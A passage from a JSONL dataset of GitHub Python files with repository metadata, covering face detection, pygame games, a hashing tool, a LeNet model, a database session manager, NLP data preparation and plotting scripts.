+= 0\n else:\n counter += 1\n if counter >= 1:\n print(\"Complete face not deteceted\")\n elif counter >= 8:\n print(\"No face detected\") \n else:\n print(\"Complete face detected\")\n\n cv2.imshow('Mediapipe Feed', image)\n\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()","repo_name":"adithya-s-k/computer_vision_projects","sub_path":"Face_detection_basic/Basic_face_detection_using_pose_estimation.py","file_name":"Basic_face_detection_using_pose_estimation.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9996056731","text":"import pygame, random, math, time, csv\nfrom datetime import date, datetime\nfrom utils import *\n\npygame.init()\n\n# graphic stuff\nscreen_width = 700\nscreen_height = 500\nscreen = pygame.display.set_mode((screen_width, screen_height))\nfont = pygame.font.SysFont(\"Arial\", 20)\nitem_size = screen_height / 7\nin_game_bg = pygame.transform.scale(load_image(\"assets/images/bg00.jpg\"), (screen_width, screen_height))\nmain_menu_bg = pygame.transform.scale(load_image(\"assets/images/bg01.png\"), (screen_width, screen_height))\nconfirm_menu_bg = pygame.transform.scale(load_image(\"assets/images/bg01.png\"), (screen_width, screen_height))\n\nallowed_spawn_screen_x_percent = 
60\nallowed_spawn_screen_x_pixels = screen_width / 100 * allowed_spawn_screen_x_percent\n\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\n\ndefault_bg_color = white\ndefault_text_color = black\n\n# game\nstatus = \"main_menu\"\nimmortality = False\nbonus_score_value = 5\nmalus_score_value = 10\n\ndefault_fruit_spawn_rate = 0.04\ndefault_malus_spawn_rate = 0.01\ndefault_bonus_spawn_rate = 0.003\nparty_banana_spawn_rate_multiplier = 10\n\n# images\nfruit_names = (\"apple\", \"orange\", \"watermelon\", \"peach\")\nmalus_names = (\"red_bomb\", \"purple_bomb\")\nbonus_names = (\"strawberry\", \"party_banana\")\nradiant_names = (\"red_radiant\", \"yellow_radiant\")\n\nitem_images = {\"apple\": \"assets/images/fruits/apple.png\",\n \"watermelon\": \"assets/images/fruits/watermelon.png\",\n \"peach\": \"assets/images/fruits/peach.png\",\n \"orange\": \"assets/images/fruits/orange.png\",\n \"red_bomb\": \"assets/images/malus/red_bomb.png\",\n \"purple_bomb\": \"assets/images/malus/purple_bomb.png\",\n \"strawberry\": \"assets/images/bonus/strawberry.png\",\n \"party_banana\": \"assets/images/bonus/party_banana.png\",\n \"red_radiant\": \"assets/images/radiants/red_radiant.png\",\n \"yellow_radiant\": \"assets/images/radiants/yellow_radiant.png\"}\n","repo_name":"JackMarelli/Python-General","sub_path":"projects/kung_fruit/gvars.py","file_name":"gvars.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38706714554","text":"import os.path\nimport argparse\nimport hashlib\n\n# Local imports\nfrom build import buildTreeHash\nfrom duplicates import findDuplicates\nfrom compare import compare\n\n\n\n###############################################################################\n# Helper functions #\n####################\ndef inexistentFile(x):\n if os.path.exists(x):\n raise argparse.ArgumentTypeError( \"{0} already exists\".format(x) )\n return os.path.abspath(x)\n\n\ndef isFolder(x):\n if os.path.exists(x) and os.path.isdir(x):\n return os.path.abspath(x)\n\n raise argparse.ArgumentTypeError(\n \"{0} is not an existing folder\".format(x) )\n\n\ndef isFile(x):\n if os.path.exists(x) and os.path.isfile(x):\n return os.path.abspath(x)\n\n raise argparse.ArgumentTypeError(\n \"{0} is not an existing file\".format(x) )\n\n\ndef commaSplitString( x ):\n hash_functions = x.split(',')\n\n for hash_function in hash_functions:\n if hash_function not in hashlib.algorithms_available:\n raise argparse.ArgumentTypeError(\n \"Invalid hash function {0}\".format( hash_function ) )\n\n return hash_functions\n\n\n# Argument parsing function\ndef parseArgs():\n parser = argparse.ArgumentParser()\n\n subparsers = parser.add_subparsers( dest='command' )\n\n\n # build command options\n parser_build = subparsers.add_parser( 'build' )\n parser_build.add_argument( 'path', type=isFolder, nargs='+' )\n parser_build.add_argument( '-o', '--out', metavar='OUTPUT_FILE',\n type=inexistentFile )\n parser_build.add_argument( '-p', '--partial', metavar='INPUT_FILE',\n type=isFile )\n parser_build.add_argument( '-H', '--hashes', metavar='HASHES',\n type=commaSplitString, default=[\"sha1\"] )\n parser_build.set_defaults( func=buildTreeHash )\n\n\n # find_duplicates command options\n parser_duplicates = subparsers.add_parser( 'find_duplicates' )\n parser_duplicates.add_argument( 'hash_db', type=isFile )\n parser_duplicates.add_argument( '-p', '--print-single-files',\n action=\"store_true\",\n default=False )\n parser_duplicates.add_argument( 
'--print-folders-with-both',\n action=\"store_true\",\n default=False )\n parser_duplicates.add_argument( '--print-folders-with-originals',\n action=\"store_true\",\n default=False )\n parser_duplicates.add_argument( '--dont-print-folders-with-duplicates',\n action=\"store_true\",\n default=False )\n parser_duplicates.add_argument( '-x', '--prefix', metavar='PREFIX',\n type=str, default=None )\n parser_duplicates.set_defaults( func=findDuplicates )\n\n\n # compare command options\n parser_compare = subparsers.add_parser( 'compare' )\n parser_compare.add_argument( 'hash_db1', type=isFile )\n parser_compare.add_argument( 'hash_db2', type=isFile )\n parser_compare.add_argument( '--db1-path', type=str )\n parser_compare.add_argument( '--db2-path', type=str )\n parser_compare.add_argument( '--print-single-files',\n action=\"store_true\",\n default=False )\n parser_compare.add_argument( '--print-all-folders',\n action=\"store_true\",\n default=False )\n parser_compare.add_argument( '--two-way',\n action=\"store_true\",\n default=False )\n parser_compare.set_defaults( func=compare )\n\n\n args = parser.parse_args()\n\n if not args.command:\n parser.print_usage()\n exit(1)\n\n return args\n###############################################################################\n\n\n\n###############################################################################\n# __ __ _ ___ _ _\n#| \\/ | / \\ |_ _| \\ | |\n#| |\\/| | / _ \\ | || \\| |\n#| | | |/ ___ \\ | || |\\ |\n#|_| |_/_/ \\_\\___|_| \\_|\n#\ndef main():\n args = parseArgs()\n args.func(args)\n###############################################################################\n\n\n\n###############################################################################\nif __name__ == '__main__':\n main()\n###############################################################################\n","repo_name":"felipou/hashtool","sub_path":"hashtool.py","file_name":"hashtool.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26107131155","text":"from typing import TYPE_CHECKING, Tuple\n\nimport tensorflow as tf\n\nif TYPE_CHECKING:\n from tensorflow.python.keras import Sequential, layers\nelse:\n from tensorflow.keras import Sequential, layers\n\n\n# noinspection PyPep8Naming\ndef LeNet(input_shape: Tuple[int, int, int] = (28, 28, 1), classes: int = 10) -> tf.keras.Model:\n \"\"\"A standard LeNet implementation in TensorFlow.\n\n The LeNet model has 3 convolution layers and 2 dense layers.\n\n Args:\n input_shape: shape of the input data (height, width, channels).\n classes: The number of outputs the model should generate.\n\n Raises:\n ValueError: Length of `input_shape` is not 3.\n ValueError: `input_shape`[0] or `input_shape`[1] is smaller than 18.\n\n Returns:\n A TensorFlow LeNet model.\n \"\"\"\n _check_input_shape(input_shape)\n model = Sequential()\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=input_shape))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(classes, activation='softmax'))\n return model\n\n\ndef _check_input_shape(input_shape):\n if len(input_shape) != 3:\n raise ValueError(\"Length of `input_shape` is not 3 (channel, height, width)\")\n\n height, width, _ = input_shape\n\n if 
height < 18 or width < 18:\n raise ValueError(\"Both height and width of input_shape need to not smaller than 18\")\n","repo_name":"fastestimator/fastestimator","sub_path":"fastestimator/architecture/tensorflow/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"35827790474","text":"# https://gist.github.com/nitred/4323d86bb22b7ec788a8dcfcac03b27a\r\n\r\nimport contextlib\r\nimport os\r\n\r\nfrom sqlalchemy import create_engine, MetaData\r\nfrom sqlalchemy.orm import sessionmaker, scoped_session\r\nfrom sqlalchemy_utils import database_exists, create_database\r\n\r\nfrom db.candle import Candle\r\nfrom globals import user_data_path\r\nfrom helpers.parameters import load_config\r\nfrom utilities.txcolors import txcolors\r\n\r\nconfig_file = user_data_path +'config.yml'\r\nparsed_config = load_config(config_file)\r\nDB_TYPE = parsed_config['data_options']['DB_TYPE']\r\nPOSTGRESS_HOST = parsed_config['data_options']['POSTGRESS_HOST']\r\nPOSTGRESS_PORT = parsed_config['data_options']['POSTGRESS_PORT']\r\nPOSTGRES_USER = parsed_config['data_options']['POSTGRES_USER']\r\nPOSTGRES_PASS = parsed_config['data_options']['POSTGRES_PASS']\r\nPOSTGRESS_DB = parsed_config['data_options']['POSTGRESS_DB']\r\n\r\n\r\nengine = None\r\nthread_safe_session_factory = None\r\n\r\n# def init_candle_engine(uri, clean_start=False, **kwargs):\r\n# \"\"\"Initialize the engine.\r\n# Args:\r\n# uri (str): The string database URI. Examples:\r\n# - sqlite:///database.db\r\n# - postgresql+psycopg2://username:password@0.0.0.0:5432/database\r\n# \"\"\"\r\n# global engine\r\n# if engine is None:\r\n# if DB_TYPE == 'SQLITE':\r\n# engine = create_engine(uri, **kwargs)\r\n# elif DB_TYPE == 'POSTGRES':\r\n# db_url = f\"postgres://{POSTGRES_USER}:{POSTGRES_PASS}@localhost/{POSTGRESS_DB}\"\r\n# engine = create_engine(db_url)\r\n# if not database_exists(db_url):\r\n# create_database(db_url)\r\n# else:\r\n# raise Exception(f'candle_db_manager: Unknown database type{txcolors.ERROR}')\r\n# if clean_start:\r\n# metadata = MetaData(engine)\r\n# metadata.reflect()\r\n# metadata.drop_all(engine, tables=metadata.sorted_tables)\r\n#\r\n# return engine\r\n\r\n\r\ndef init_candle_session_factory(uri, clean_start=False, **kwargs):\r\n \"\"\"Initialize the engine.\r\n Args:\r\n uri (str): The string database URI. 
Examples:\r\n - sqlite:///database.db\r\n - postgresql+psycopg2://username:password@0.0.0.0:5432/database\r\n \"\"\"\r\n clean_start = False\r\n try:\r\n global engine\r\n if engine is None:\r\n if DB_TYPE == 'SQLITE':\r\n engine = create_engine(uri, **kwargs)\r\n elif DB_TYPE == 'POSTGRES':\r\n if os.name == 'nt':\r\n db_host = f'{POSTGRESS_HOST}:{POSTGRESS_PORT}'\r\n else:\r\n db_host = f'{POSTGRESS_HOST}'\r\n db_url = f\"postgresql+psycopg2://{POSTGRES_USER}:{POSTGRES_PASS}@{db_host}/{POSTGRESS_DB}\"\r\n engine = create_engine(db_url)\r\n if not database_exists(db_url):\r\n create_database(db_url)\r\n print(f'Connected to POSTGRES database successfully{txcolors.SUCCESS}')\r\n else:\r\n print(f'candle_db_manager: Unknown database type{txcolors.ERROR}')\r\n exit(-1)\r\n\r\n # if clean_start:\r\n # metadata = MetaData(engine)\r\n # metadata.reflect()\r\n # metadata.drop_all(engine, tables=metadata.sorted_tables)\r\n\r\n Candle.metadata.create_all(engine)\r\n print('Candle DB created.')\r\n\r\n \"\"\"Initialize the thread_safe_session_factory.\"\"\"\r\n global thread_safe_session_factory\r\n # if engine is None:\r\n # raise ValueError(\"Initialize engine by calling init_candle_engine before calling init_session_factory!\")\r\n if thread_safe_session_factory is None:\r\n thread_safe_session_factory = scoped_session(sessionmaker(bind=engine))\r\n return thread_safe_session_factory\r\n except Exception as e:\r\n print(f'candle_db_manager: error {e}{txcolors.ERROR}')\r\n\r\n@contextlib.contextmanager\r\ndef ManagedCandleDBSession():\r\n \"\"\"Get a session object whose lifecycle, commits and flush are managed for you.\r\n Expected to be used as follows:\r\n ```\r\n with ManagedCandleDBSession() as session: # multiple db_operations are done within one session.\r\n db_operations.select(session, **kwargs) # db_operations is expected not to worry about session handling.\r\n db_operations.insert(session, **kwargs) # after the with statement, the session commits to the database.\r\n ```\r\n \"\"\"\r\n global thread_safe_session_factory\r\n if thread_safe_session_factory is None:\r\n raise ValueError(\"Call init_session_factory before using ManagedCandleDBSession!\")\r\n session = thread_safe_session_factory()\r\n try:\r\n yield session\r\n session.commit()\r\n session.flush()\r\n except Exception:\r\n session.rollback()\r\n # When an exception occurs, handle session session cleaning,\r\n # but raise the Exception afterwards so that user can handle it.\r\n raise\r\n finally:\r\n # source: https://stackoverflow.com/questions/21078696/why-is-my-scoped-session-raising-an-attributeerror-session-object-has-no-attr\r\n thread_safe_session_factory.remove()","repo_name":"mupsje/Binance-volatility-trading-bot","sub_path":"db/candle_db_manager.py","file_name":"candle_db_manager.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"35023434752","text":"import os\nimport random\nimport pandas as pd\nimport re\n\ndata_dir = 'NLPCC2016KBQA'\nfile_name_list = ['train.txt','dev.txt','test.txt']\nnew_dir = 'sim_data'\npattern = re.compile('^-+') # 以-开头\nfor file_name in file_name_list:\n\n q_t_a_list = []\n seq_q_list = []\n seq_tag_list = []\n attribute_classify_sample = []\n\n file_path_name = os.path.join(data_dir,file_name)\n assert os.path.exists(file_path_name)\n with open(file_path_name,'r',encoding='utf-8') as f:\n q_str = \"\"\n t_str = \"\"\n a_str = \"\"\n\n for line in f:\n if 'question' in line:\n q_str = 
line.strip()\n if 'triple' in line:\n t_str = line.strip()\n if 'answer' in line:\n a_str = line.strip()\n\n if '===' in line: # new question answer triple\n entities = t_str.split(\"|||\")[0].split(\">\")[1].strip()\n q_str = q_str.split(\">\")[1].replace(\" \", \"\").strip()\n q_t_a_list.append([q_str, t_str, a_str])\n df = pd.DataFrame(q_t_a_list, columns=[\"q_str\", \"t_str\", \"a_str\"])\n df['attribute'] = df['t_str'].apply(lambda x: x.split('|||')[1].strip())\n attribute_list = df['attribute'].tolist() # 转化成列表\n attribute_list = list(set(attribute_list)) # 去重\n attribute_list = [att.strip().replace(' ', '') for att in attribute_list] # 去尾部,去空格\n attribute_list = [re.sub(pattern, '', att) for att in attribute_list] # 去掉 以-开头\n\n attribute_list = list(set(attribute_list)) # 再去重\n\n for row in df.index:\n question, pos_att = df.loc[row][['q_str', 'attribute']]\n\n question = question.strip().replace(' ', '') # 去尾部,空格\n question = re.sub(pattern, '', question) # 去掉 以-开头\n\n pos_att = pos_att.strip().replace(' ', '') # 去尾部,空格\n pos_att = re.sub(pattern, '', pos_att) # 去掉 以-开头\n\n neg_att_list = []\n while True:\n neg_att_list = random.sample(attribute_list, 5)\n if pos_att not in neg_att_list:\n break\n attribute_classify_sample.append([question, pos_att, '1'])\n\n neg_att_sample = [[question, neg_att, '0'] for neg_att in neg_att_list]\n attribute_classify_sample.extend(neg_att_sample)\n seq_result = [str(lineno) + '\\t' + '\\t'.join(line) for (lineno, line) in enumerate(attribute_classify_sample)]\n\n if not os.path.exists(new_dir):\n os.makedirs(new_dir)\n\n file_type = file_name.split('.')[0]\n print(\"***** {} ******\".format(file_type))\n new_file_name = file_type + '.' + 'txt'\n with open(os.path.join(new_dir, new_file_name), \"w\", encoding='utf-8') as f:\n f.write(\"\\n\".join(seq_result))\n f.close()\n","repo_name":"1105425455/Bert","sub_path":"input/data_/5-bertforsequence-data.py","file_name":"5-bertforsequence-data.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21597050254","text":"# coding=utf-8 \n# @Time :2018/12/27 10:53\n\n\"\"\"Modifying a dictionary while iterating over it\"\"\"\n\nx = {0: None}\n\nfor i in x:\n del x[i]\n x[i + 1] = None\n print(i)\n\n\"\"\"\nPython不支持对字典进行迭代的同时修改它.因为字典的初始最小值是8, 扩容会导致散列表地址发生变化而中断循环\n\n在不同的Python实现中删除键的处理方式以及调整大小的时间可能会有所不同.\n(译: 就是说什么时候扩容在不同版本中可能是不同的, 在3.6及3.7的版本中到5就会自动扩容了.\n以后也有可能再次发生变化. 顺带一提,后面两次扩容会扩展为32和256. 
8->32->256)\n\"\"\"\n\n\"\"\"Stubborn del operator/坚强的 del\"\"\"\n\n\nclass SomeClass:\n def __del__(self):\n print(\"Deleted!\")\n\n\nx = SomeClass()\ny = x\n\ndel x # print None\ndel y # print Deleted!\n\nx1 = SomeClass\ny1 = x1\ndel x1\nprint(y1) # 检查一下y是否存在-->是存在的\n\ndel y1\nglobals()\n\n\"\"\"\ndel x 并不会立刻调用 x.__del__().\n每当遇到 del x, Python 会将 x 的引用数减1, 当 x 的引用数减到0时就会调用 x.__del__().\n\n在第二个例子中, y1.__del__() 之所以未被调用, 是因为前一条语句 (>>> y1) 对同一对象创建了另一个引用, \n从而防止在执行 del y1 后对象的引用数变为0.\n调用 globals 导致引用被销毁, 因此我们可以看到 \"Deleted!\" 终于被输出了.\n\"\"\"\n","repo_name":"July523/Daily_Test","sub_path":"wtf_python/test20.py","file_name":"test20.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19522022004","text":"from django.core.management.base import BaseCommand\nfrom exercises.models import Video, Exercise\nfrom users.models import User\n\nimport pandas as pd\nimport numpy as np\nimport os\n\nadmin_username = os.environ.get(\"ADMIN_ID\")\nexercise_data = os.environ.get(\"EXERCISE_DATA\")\n\n\nclass Command(BaseCommand):\n\n help = \"This command creates videos in exercises\"\n\n def handle(self, *args, **options):\n admin = User.objects.get_or_none(username=admin_username)\n if not admin:\n\n df_django = pd.read_csv(exercise_data)\n\n # print(df_django.head())\n names = df_django[\"exercise_name_web\"].to_list()\n video_urls = df_django[\"video_url\"].to_list()\n\n for n in range(0, len(names)):\n one_exercise = Exercise.objects.get(name=names[n])\n Video.objects.create(\n video_caption=\"\", video_url=video_urls[n], exercise=one_exercise,\n )\n\n self.stdout.write(\n self.style.SUCCESS(\"Initial Seeding - Exercise Videos Created\")\n )\n else:\n self.stdout.write(\n self.style.SUCCESS(f\"Not initial seeding -- Superuser exists\")\n )\n","repo_name":"snoop2head/fitcuration-django","sub_path":"exercises/management/commands/seed_videos.py","file_name":"seed_videos.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"8661849094","text":"from models import area, sensor\nimport matplotlib.pyplot as plt\n\nradius_list = list(range(10, 250, 10))\n# angle_list = range(0, -180, -5)\n# RADIUS = 100\nANGLE = -30\n\nresult_list = []\n# 实验次数 ,用来计算修复的成功率 p = 成功修复次数/总次数。 \ntest_num = 100\n\nfor RADIUS in radius_list:\n success_num = 0\n for number in range(test_num):\n area_obj = area.Area(RADIUS, ANGLE)\n area_obj.standardSensor()\n area_obj.backupRandomSensor()\n area_obj.buildBarrier()\n\n day_num = 20\n success_tag = True\n for dn in range(day_num):\n # 存在传感器能量耗尽\n if area_obj.dayByDay() is False:\n print(\"检测到漏洞!\")\n success_tag = area_obj.repairBarrier()\n # 只要有一个不能修复则直接,修复失败\n if success_tag is False:\n break\n if success_tag:\n success_num += 1\n # 计算成功率\n print(\"半径:\",RADIUS)\n print(\"修补成功率:\",success_num/test_num)\n # print(\"半径\",RADIUS,\"的\", success_num,\"修补成功率!\" )\n result_list.append(success_num/test_num)\n\nplt.plot(radius_list, result_list)\nplt.title('Radius-P')\nplt.xlabel('Radius')\nplt.ylabel('P')\nplt.show()\n\n\n\n\n\n","repo_name":"leslieducy/Postgraduate","sub_path":"IoT/radius_plot.py","file_name":"radius_plot.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37792596240","text":"import textwrap\nimport copy\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nfrom 
tree_utils import hierarchical_tree_pos, draw_hierarchical_tree\nfrom tree_utils import DEFAULT_HIERARCHY\nfrom tree_plot import DISP_HIERARCHY\nimport networkx as nx\nimport csv\nimport numpy as np\n\nif __name__ == '__main__':\n G = nx.Graph()\n nodes = []\n node_sizes = []\n node_colors = []\n edges = []\n f1s = {}\n norm = matplotlib.colors.Normalize(0.3,1.0)\n cmap = plt.cm.ScalarMappable(norm, cmap=plt.cm.plasma)\n row_names = []\n #cmap.set_clim(0.5,0.6)\n np.set_printoptions(threshold=np.nan)\n #for f in ['merge_level_notuning0.csv', 'merge_level_notuning1.csv', 'merge_level_notuning2.csv']:\n for f in ['cell_merge_level_v4_0.csv', 'cell_merge_level_v4_1.csv', 'cell_merge_level_v4_2.csv']:\n for row in csv.DictReader(open(f)):\n try:\n DEFAULT_HIERARCHY[row['Name']]\n except:\n print(row['Name'], 'No code!')\n \n code = DEFAULT_HIERARCHY[row['Name']]\n if code == '' or int(float(row['count'])) == 0:\n continue\n\n print(row['Name'], code)\n row_names.append(row['Name'])\n G.add_edge(code[:-1], code)\n nodes.append(code)\n edges.append((code[:-1], code))\n #node_colors.append(plt.cm.viridis(float(row['f1_score'])))\n #node_colors.append(float(row['f1_score']))\n node_colors.append(cmap.to_rgba(float(row['f1_score'])))\n num = int(float(row['count']))\n node_sizes.append(max(300, np.sqrt(num) * 6)) # /3.0) # min(1000, lengths[code]))\n\n f1s[code] = float(row['f1_score'])\n print(row_names)\n #nmin = min(node_colors)\n #nmax = max(node_colors)\n #node_colors = list(map(plt.cm.viridis, map(lambda x: ((0.6-0.5) * (x - nmin) / (nmax - nmin)) + 0.5, node_colors)))\n print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')\n pos = hierarchical_tree_pos(G, '')\n print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')\n print(pos.keys())\n distances = np.ones([len(nodes),len(nodes)])\n print(len(nodes)) \n for i,(nodei,currname) in enumerate(zip(nodes,row_names)):\n print(currname)\n for j,nodej in enumerate(nodes):\n distances[i][j] = nx.shortest_path_length(G,source=nodei,target=nodej)\n key_string = ','.join(row_names)\n np.savetxt('distances.csv',distances,delimiter=',',header=key_string) \n# with open('distances.csv', 'w') as csvfile:\n# spamwriter = csv.writer(csvfile, delimiter=',',\n# quotechar='|', quoting=csv.QUOTE_MINIMAL)\n# spamwriter.writerow(DEFAULT_HIERARCHY)\n# for label in DEFAULT_HIERARCHY:\n# spamwriter.writerow(label+','+)\n\n #distances = get_tree_distances(G,nodes=nodes)\n fig, ax = draw_hierarchical_tree(G, pos, nodes=nodes, node_size=node_sizes,\n node_color=node_colors, edges=edges, sm=cmap)\n\n\n\n labels = {k: v for (k, v) in DISP_HIERARCHY.items()}\n labelpos = copy.deepcopy(pos)\n f_tex = \"{:.2f}\"\n l1 = len('(fibrillar center)')\n l2 = len('bodies/speckles')\n for c in labelpos:\n if c == '':\n continue\n originalpos = labelpos[c]\n if c in f1s:\n if f1s[c] <= 0.45:\n color = 'white'\n else:\n color = 'black'\n ax.text(originalpos[0]-0.010, originalpos[1]-0.0025,\n f_tex.format(f1s[c]), fontsize=8, color=color)\n if len(c) > 2:\n ax.text(originalpos[0], originalpos[1]-0.032,\n '\\n'.join(textwrap.wrap(labels[c], l1)), rotation=-40, fontsize=8,\n fontdict={'family': 'Sans-serif'})\n else: # if len(c) <= 2\n ax.text(originalpos[0]+0.0260, originalpos[1]-0.005,\n '\\n'.join(textwrap.wrap(labels[c], l2)), rotation=0, fontsize=8,\n fontdict={'family': 'Sans-serif'})\n \n fig.savefig('devin_tree2.pdf', transparent=True)\n 
#fig.savefig('devin_tree_prop.pdf', transparent=True)\n","repo_name":"CellProfiling/ProjectDiscovery","sub_path":"plotting_python/f1_tree_plots/plotting_pd_tree.py","file_name":"plotting_pd_tree.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8538127919","text":"#!/bin/python\n\nimport pygame\nimport pygame.gfxdraw\nimport pygame.draw\nimport pygame.image\nimport pygame.mixer\nimport pygame.font\nimport math\nimport os\nimport random\n\n# Seed initialization:\nrandom.seed()\n\n# Color declaration:\n\ncolors = {\t'black':\t(0,0,0),\n\t\t'white':\t(255,255,255),\n\t\t'red':\t\t(255,0,0),\n\t\t'green':\t(0,255,0),\n\t\t'blue':\t\t(0,0,255),\n\t\t'yellow':\t(255,255,0),\n\t\t'cyan':\t\t(0,255,255),\n\t\t'magenta':\t(255,0,255),\n\t\t'azure':\t(0,127,255),\n\t\t'violet':\t(127,0,255),\n\t\t'rose':\t\t(255,0,127),\n\t\t'orange':\t(255,127,0),\n\t\t'chartreuse':\t(127,255,0),\n\t\t'spring':\t(0,255,127)}\n\nprimaries = ['red','green','blue']\nsecondaries = ['yellow','cyan','magenta']\ntertiaries = ['azure','violet','rose','orange','chartreuse','spring']\n\nsaturated = tertiaries\n\nbw = ['black','white']\n\nallcols = bw + saturated\n\n# Draw a polygon:\ndef drawpoly(targetsurface,polyverts,incolor,bordercolor,border):\n\tpygame.draw.polygon(targetsurface,incolor,polyverts,0)\n\tif border != 0:\n\t\tpygame.draw.polygon(targetsurface,bordercolor,polyverts,border)\n\n# Generate ngon poly list:\ndef ngonlist(centerx,centery,n,radius,angle):\n\tif n < 3:\n\t\treturn []\n\tpolyverts = []\n\tfor i in range(n):\n\t\tfinangle = i * ((2 * math.pi) / n) + angle\n\t\thorizcomp = radius * math.cos(finangle)\n\t\tvertcomp = radius * math.sin(finangle)\n\t\tpolyverts.append( (centerx + horizcomp,centery + vertcomp) )\n\treturn polyverts\n\n# Draw an ngon:\ndef purengon(targetsurface,centerx,centery,n,radius,angle,incolor,bordercolor,border):\n\tif n < 3:\n\t\treturn\n\tpolyverts = ngonlist(centerx,centery,n,radius,angle)\n\tdrawpoly(targetsurface,polyverts,incolor,bordercolor,border)\n\n# Player:\n\ndefault_pangle = - math.pi / 2\n\ndefault_pspeed = 0.0\n\ndefault_pmaxspeed = 10.0\n\n\ndefault_paccelv = 0.2\n\ndefault_pdecelv = 0.3\n\ndefault_paccel = False\n\ndefault_pdecel = False\n\ndefault_pport = False\n\ndefault_pstarboard = False\n\ndefault_pangulaccel = 0.06\n\ndefault_px = 0.0\n\ndefault_py = 0.0\n\ndefault_pstate = 3\n\ndefault_pradius = 20\n\ndefault_pcolor = 2\n\ndef renderplayer(targetsurface):\n\tpolyverts = ngonlist(gamewidth//2,gameheight//2,pstate,pradius,pangle)\n\tpygame.draw.line(targetsurface,colors[saturated[pcolor]],polyverts[0],(polyverts[0][0] + 0.25*pradius*math.cos(pangle),polyverts[0][1] + 0.25*pradius*math.sin(pangle)),2)\n\tdrawpoly(targetsurface,polyverts,colors[saturated[pcolor]],colors['black'],2)\n\n# Enemy stuff:\n\nenemies = []\n\ndef gencoords(radius):\n\t# Draws a radial distance from a zero-mean Gaussian (sigma = radius/3, so\n\t# ~99.7% of spawns lie within radius), rejecting anything closer than 400 px\n\t# so enemies always appear off-screen.\n\tabsolute = 0\n\twhile abs(absolute) < 400:\n\t\tabsolute = random.gauss(0,radius/3)\n\tphase = random.uniform(-math.pi,math.pi)\n\txcoord = absolute * math.cos(phase) + px\n\tycoord = absolute * math.sin(phase) + py\n\treturn (xcoord,ycoord)\n\ndef genenemies(n,radius):\n\telist = []\n\tfor i in range(n):\n\t\tpos = gencoords(radius)\n\t\tsides = random.randint(3,5)\n\t\tcolnum = random.randint(0,len(saturated)-1)\n\t\teangle = random.uniform(-math.pi,math.pi)\n\t\telist.append((pos[0],pos[1],sides,colnum,eangle))\n\treturn elist\n\ndef 
renderenemy(targetsurface,enemy):\n\tex = int(enemy[0] + gamewidth//2 - px)\n\tey = int(enemy[1] + gameheight//2 + py)\n\tpverts = ngonlist(ex,ey,enemy[2],5,enemy[4])\n\trender = False\n\tfor pair in pverts:\n\t\tif pair[0] >= 0 and pair[0] < gamewidth and pair[1] >= 0 and pair[1] < gameheight:\n\t\t\trender = True\n\t\t\tbreak\n\tif not render:\n\t\treturn False\n\tdrawpoly(targetsurface,pverts,colors[saturated[enemy[3]]],colors['black'],1)\n\treturn True\n\n\n\ndef renderenemies(targetsurface):\n\tcount = 0\n\tfor e in enemies:\n\t\tif renderenemy(targetsurface,e):\n\t\t\tcount += 1\n\treturn count\n\ndef tickenemies(radius):\n\tglobal pradius\n\tfor i in range(len(enemies)):\n\t\te = enemies[i]\n\t\tex = e[0]\n\t\tey = e[1]\n\t\teangle = e[4]\n\t\tdists = (ex - px)**2 + (-ey - py)**2\n\t\tif dists <= pradius**2:\n\t\t\tnewc = gencoords(radius)\n\t\t\tif e[2] == pstate:\n\t\t\t\tif e[3] == pcolor:\n\t\t\t\t\tpradius += 1\n\t\t\t\t\tblip.play()\n\t\t\t\telse:\n\t\t\t\t\tnop.play()\n\t\t\telse:\n\t\t\t\tpradius -=1\n\t\t\t\touch.play()\n\t\t\tnewangle = random.uniform(-math.pi,math.pi)\n\t\t\tnewcol = random.randint(0,len(saturated)-1)\n\t\t\tnewsides = random.randint(3,5)\n\t\t\tenemies[i] = (newc[0],newc[1],newsides,newcol,newangle)\n\t\t\tcontinue\n\t\tif dists >= 1.2*radius**2:\n\t\t\tnewc = gencoords(radius)\n\t\t\tnewangle = random.uniform(-math.pi,math.pi)\n\t\t\tnewcol = random.randint(0,len(saturated)-1)\n\t\t\tnewsides = random.randint(3,5)\n\t\t\tenemies[i] = 